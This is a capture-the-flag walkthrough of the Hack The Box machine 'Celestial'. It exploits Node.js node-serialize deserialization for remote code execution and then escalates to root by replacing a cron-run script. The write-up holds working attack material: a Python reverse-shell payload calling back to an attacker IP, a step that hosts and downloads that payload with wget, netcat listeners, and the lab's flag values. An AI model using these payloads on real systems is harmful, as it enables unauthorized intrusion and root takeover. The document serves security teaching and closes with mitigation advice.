htb-writeups

Celestial HTB Walkthrough

A comprehensive penetration testing walkthrough of the Celestial HTB machine demonstrating advanced exploitation techniques including Node.js deserialization attacks and privilege escalation through cron job manipulation.

🎯 Executive Summary

Celestial is a Linux-based vulnerable machine that showcases the dangers of insecure deserialization in Node.js applications. The exploitation path involves:

1. Identifying a Node.js application vulnerable to deserialization attacks
2. Crafting a malicious serialized payload for remote code execution
3. Leveraging misconfigured cron jobs for privilege escalation
4. Gaining root access through scheduled task manipulation

🔍 Reconnaissance

Initial Scanning

export target=10.129.228.94

# Comprehensive port scan
sudo nmap -p- --min-rate 1000 -sT -vvv $target

# Service enumeration on discovered ports
sudo nmap -sC -sV -p 3000 -T4 $target

Scan Results:

• Port 3000/tcp: HTTP service running Node.js Express framework
• No other ports detected as open

Web Application Assessment

Visiting http://10.129.228.94:3000/ reveals a simple web application that processes user information through serialized cookies.

🕵️ Vulnerability Analysis

Cookie Manipulation

The application uses base64-encoded serialized cookies for session management:

Original Cookie Analysis:

Cookie: eyJ1c2VybmFtZSI6IkR1bW15IiwiY291bnRyeSI6IklkayBQcm9iYWJseSBTb21ld2hlcmUgRHVtYiIsImNpdHkiOiJMYW1ldG93biIsIm51bSI6IjIifQ%3D%3D

# URL decode + Base64 decode reveals:
{"username":"Dummy","country":"Idk Probably Somewhere Dumb","city":"Lametown","num":"2"}

Vulnerability Confirmation

Modifying the cookie values directly affects application output, confirming insecure deserialization:

Test Payload:

{"username":"admin","country":"Idk Probably Somewhere Dumb","city":"Lametown","num":"4444"}

Response: “admin4444” confirms the application deserializes and executes user-controlled data.

💣 Initial Exploitation

Research and Preparation

The vulnerability aligns with known Node.js deserialization exploits documented in Exploit-DB 41289.

Required Tools:

# Install vulnerable library for payload generation
npm install node-serialize

# Download nodejsshell.py for payload generation
wget https://raw.githubusercontent.com/ajinabraham/Node.Js-Security-Course/master/nodejsshell.py

Payload Generation

Step 1: Generate reverse shell payload

python2 nodejsshell.py 10.10.14.89 4444

Step 2: Create exploit script (log.js)

var y = {
rce : function(){
  // Generated reverse shell payload from nodejsshell.py
  eval(String.fromCharCode(...))
},
}
var serialize = require('node-serialize');
console.log("Serialized: \n" + serialize.serialize(y));

Step 3: Execute and modify payload

node log.js

Step 4: Add invocation parentheses - Critical step to ensure function execution during deserialization.

Final Exploit Delivery

The crafted malicious cookie payload is:

• Base64 encoded
• URL encoded
• Submitted as session cookie

Reverse Shell Listener:

nc -nlvp 4444

Initial Access

Successful exploitation provides a reverse shell as user sun.

User Flag:

cat user.txt
96abe38234f67c3f5f25c8f601abe83e

⬆️ Privilege Escalation

Enumeration

Cron Job Analysis:

cat /var/log/syslog | grep -i "CRON"

Discovery:

Oct 28 05:00:01 celestial CRON[7365]: (root) CMD (python /home/sun/Documents/script.py > /home/sun/output.txt; cp /root/script.py /home/sun/Documents/script.py; chown sun:sun /home/sun/Documents/script.py; chattr -i /home/sun/Documents/script.py; touch -d "$(date -R -r /home/sun/Documents/user.txt)" /home/sun/Documents/script.py)

Cron Job Analysis

Key findings:

• Script runs every 5 minutes as root
• Executes /home/sun/Documents/script.py
• User sun has write permissions to the script directory
• Script gets replaced every execution from /root/script.py

Exploitation Strategy

Step 1: Create reverse shell payload

import socket,subprocess,os
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(("10.10.14.89",9001))
os.dup2(s.fileno(),0)
os.dup2(s.fileno(),1)
os.dup2(s.fileno(),2)
p=subprocess.call(["/bin/sh","-i"])

Step 2: Host payload

python3 -m http.server 80

Step 3: Replace existing script

cd /home/sun/Documents
rm -f script.py
wget 10.10.14.89/s.py
mv s.py script.py

Step 4: Set up listener

nc -nlvp 9001

Root Access

After cron job execution (within 5 minutes), root shell is obtained.

Privilege Verification:

id
whoami
hostname

Root Flag:

cat /root/root.txt
38ba1e10e076213df5db26d1fc5fe7aa

🎓 Lessons Learned

Critical Vulnerabilities

1. Insecure Deserialization
   • Application blindly trusted user-supplied serialized data
   • No validation or sanitization of input
   • Use of vulnerable node-serialize library
2. Privilege Misconfiguration
   • Cron job running with excessive privileges
   • Write permissions granted to low-privilege user
   • Lack of file integrity checks

Mitigation Strategies

For Developers:

• Implement proper input validation and sanitization
• Avoid insecure serialization libraries
• Use JSON web tokens or other secure session management
• Regular security dependency audits

For System Administrators:

• Follow principle of least privilege for scheduled tasks
• Implement file integrity monitoring
• Regular security patching and updates
• Proper logging and monitoring of system activities

Tools Used

• Nmap: Network reconnaissance and service enumeration.
• Burp Suite: Web application analysis, intercepting/modifying requests and cookie manipulation for testing auth & session flows.
• Node.js: Runtime for building and running payloads, custom exploit servers, and serialization/deserialization test harnesses.
• Netcat: Lightweight TCP/UDP listener and reverse/forward shell handler for debugging and pivoting.
• Python HTTP Server: Quick payload hosting and simple file transfer (one-liner static file server).
• node-serialize (library): JavaScript object serialization/deserialization used to craft exploit payloads against insecure deserializers.
• nodejsshell.py: (utility) generator/launcher for Node.js-compatible reverse shell payloads — useful for creating and testing callbacks.

🔒 Security Recommendations

1. Immediate Actions
   • Replace vulnerable serialization library
   • Implement proper input validation
   • Restrict cron job permissions
2. Long-term Strategies
   • Regular security training for developers
   • Implement CI/CD security scanning
   • Conduct periodic penetration tests
3. Monitoring
   • File integrity monitoring for critical scripts
   • Log analysis for deserialization attempts
   • Network monitoring for reverse shell connections

**⚠️ Disclaimer** *This walkthrough is for educational purposes only. Always ensure you have proper authorization before conducting security testing.*